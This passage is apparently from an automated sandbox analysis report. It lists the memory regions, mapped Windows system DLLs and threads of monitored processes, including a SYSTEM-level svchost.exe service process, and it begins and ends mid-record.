"\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36082 start_va = 0x2ef0000 end_va = 0x2efffff entry_point = 0x2ef0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36083 start_va = 0x2f00000 end_va = 0x2f0ffff entry_point = 0x2f00000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36084 start_va = 0x2f10000 end_va = 0x2f1ffff entry_point = 0x2f10000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36085 start_va = 0x2f20000 end_va = 0x2f2ffff entry_point = 0x2f20000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 36086 start_va = 0x6ce40000 end_va = 0x6cfe2fff entry_point = 0x6ce40000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 36087 start_va = 0x6fce0000 end_va = 0x6fcecfff entry_point = 0x6fce0000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 36088 start_va = 0x6fcf0000 end_va = 0x6fd3efff entry_point = 0x6fcf0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 36089 start_va = 0x6fd40000 end_va = 0x6fd97fff entry_point = 0x6fd40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 36090 start_va = 0x6fda0000 end_va = 0x6fdc7fff entry_point = 0x6fda0000 region_type = mapped_file name = "ncsi.dll" filename = "\\Windows\\System32\\ncsi.dll" (normalized: "c:\\windows\\system32\\ncsi.dll") Region: id = 36091 start_va = 0x6fdd0000 end_va = 0x6fe0dfff entry_point = 0x6fdd0000 region_type = mapped_file name = "nlasvc.dll" filename = "\\Windows\\System32\\nlasvc.dll" (normalized: "c:\\windows\\system32\\nlasvc.dll") Region: id = 36092 start_va = 0x70370000 end_va = 0x7037ffff entry_point = 0x70370000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 36093 start_va = 0x70380000 end_va = 0x70495fff entry_point = 0x70380000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 36094 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 36095 start_va = 0x704b0000 end_va = 0x704d3fff entry_point = 0x704b0000 region_type = mapped_file name = "cryptsvc.dll" filename = "\\Windows\\System32\\cryptsvc.dll" (normalized: "c:\\windows\\system32\\cryptsvc.dll") Region: id = 36096 start_va = 0x71900000 end_va = 0x71916fff entry_point = 0x71900000 region_type = mapped_file name = "wkssvc.dll" filename = "\\Windows\\System32\\wkssvc.dll" (normalized: "c:\\windows\\system32\\wkssvc.dll") Region: id = 36097 start_va = 0x73670000 end_va = 0x73681fff entry_point = 0x73670000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 36098 start_va = 0x73690000 end_va = 0x7369cfff entry_point = 0x73690000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 36099 start_va = 0x736a0000 end_va = 0x736a4fff entry_point = 0x736a0000 region_type = mapped_file name = "dnsext.dll" filename = "\\Windows\\System32\\dnsext.dll" (normalized: "c:\\windows\\system32\\dnsext.dll") Region: id = 36100 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 36101 start_va = 0x736f0000 end_va = 0x73712fff entry_point = 0x736f0000 region_type = mapped_file name = "dnsrslvr.dll" filename = "\\Windows\\System32\\dnsrslvr.dll" (normalized: "c:\\windows\\system32\\dnsrslvr.dll") Region: id = 36102 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 36103 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 36104 start_va = 0x73820000 end_va = 0x73866fff entry_point = 0x73820000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 36105 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 36106 start_va = 0x73c30000 end_va = 0x73c3efff entry_point = 0x73c30000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 36107 start_va = 0x73c40000 end_va = 0x73c4efff entry_point = 0x73c40000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 36108 start_va = 0x73c50000 end_va = 0x73c58fff entry_point = 0x73c50000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 36109 start_va = 0x73d60000 end_va = 0x73d6cfff entry_point = 0x73d60000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 36110 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 36111 start_va = 0x74320000 end_va = 0x74331fff entry_point = 0x74320000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 36112 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 36113 start_va = 0x74a10000 end_va = 0x74a25fff entry_point = 0x74a10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 36114 start_va = 0x74a30000 end_va = 0x74a46fff entry_point = 0x74a30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 36115 start_va = 0x74b20000 end_va = 0x74b27fff entry_point = 0x74b20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 36116 start_va = 0x74b30000 end_va = 0x74b6cfff entry_point = 0x74b30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 36117 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 36118 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 36119 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 36120 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 36121 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 36122 start_va = 0x74f20000 end_va = 0x74f4afff entry_point = 0x74f20000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 36123 start_va = 0x74f80000 end_va = 0x74f96fff entry_point = 0x74f80000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 36124 start_va = 0x75010000 end_va = 0x75051fff entry_point = 0x75010000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 36125 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 36126 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 36127 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 36128 start_va = 0x75340000 end_va = 0x75368fff entry_point = 0x75340000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 36129 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 36130 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 36131 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 36132 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 36133 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36134 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 36135 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 36136 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 36137 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 36138 start_va = 0x75820000 end_va = 0x75824fff entry_point = 0x75820000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 36139 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 36140 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36141 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 36142 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36143 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 36144 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36145 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 36146 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 36147 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 36148 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 36149 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 36150 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36151 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 36152 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 36153 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 36154 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36155 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36156 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 36157 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 36158 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 36159 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 36160 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 36161 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36162 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 36163 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 36164 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 36165 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 36166 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 36167 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 36168 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 36169 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 36170 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 36171 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 36172 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 900 os_tid = 0xc8c Thread: id = 901 os_tid = 0x904 Thread: id = 902 os_tid = 0x268 Thread: id = 903 os_tid = 0x3f8 Thread: id = 904 os_tid = 0x6e0 Thread: id = 905 os_tid = 0xc8 Thread: id = 906 os_tid = 0x724 Thread: id = 907 os_tid = 0x688 Thread: id = 908 os_tid = 0x5f0 Thread: id = 909 os_tid = 0x468 Thread: id = 910 os_tid = 0x464 Thread: id = 911 os_tid = 0x460 Thread: id = 912 os_tid = 0x454 Thread: id = 913 os_tid = 0x444 Thread: id = 914 os_tid = 0x440 Thread: id = 940 os_tid = 0xd24 Thread: id = 946 os_tid = 0xf20 Thread: id = 948 os_tid = 0xee0 Thread: id = 949 os_tid = 0xe14 Thread: id = 951 os_tid = 0xfe0 Process: id = "656" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ea161a0" os_pid = "0x330" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "298" os_parent_pid = "0x358" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a86c" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 36191 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 36192 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 36193 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 36194 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 36195 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 36196 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 36197 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 36198 start_va = 0x110000 end_va = 0x117fff entry_point = 0x110000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 36199 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 36200 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 36201 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 36202 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 36203 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 36204 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 36205 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 36206 start_va = 0x250000 end_va = 0x251fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 36207 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 36208 start_va = 0x360000 end_va = 0x460fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 36209 start_va = 0x470000 end_va = 0x471fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 36210 start_va = 0x480000 end_va = 0x481fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 36211 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 36212 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 36213 start_va = 0x4f0000 end_va = 0x56ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 36214 start_va = 0x570000 end_va = 0x962fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 36215 start_va = 0x970000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 36216 start_va = 0x9b0000 end_va = 0x9effff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 36217 start_va = 0x9f0000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 36218 start_va = 0xa30000 end_va = 0xa30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 36219 start_va = 0xa40000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 36220 start_va = 0xa80000 end_va = 0xa80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 36221 start_va = 0xa90000 end_va = 0xa9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 36222 start_va = 0xaa0000 end_va = 0xaa4fff entry_point = 0xaa0000 region_type = mapped_file name = "sysmain.dll.mui" filename = "\\Windows\\System32\\en-US\\sysmain.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sysmain.dll.mui") Region: id = 36223 start_va = 0xab0000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 36224 start_va = 0xb10000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 36225 start_va = 0xb50000 end_va = 0xb8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 36226 start_va = 0xb90000 end_va = 0xe5efff entry_point = 0xb90000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 36227 start_va = 0xeb0000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 36228 start_va = 0xec0000 end_va = 0xefffff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 36229 start_va = 0xf90000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 36230 start_va = 0x1000000 end_va = 0x103ffff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 36231 start_va = 0x1040000 end_va = 0x107ffff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 36232 start_va = 0x1080000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 36233 start_va = 0x1210000 end_va = 0x124ffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 36234 start_va = 0x12a0000 end_va = 0x12dffff entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 36235 start_va = 0x1300000 end_va = 0x133ffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 36236 start_va = 0x1410000 end_va = 0x141ffff entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 36237 start_va = 0x1430000 end_va = 0x146ffff entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 36238 start_va = 0x14b0000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 36239 start_va = 0x1560000 end_va = 0x159ffff entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 36240 start_va = 0x15e0000 end_va = 0x15effff entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 36241 start_va = 0x1610000 end_va = 0x161ffff entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 36242 start_va = 0x1620000 end_va = 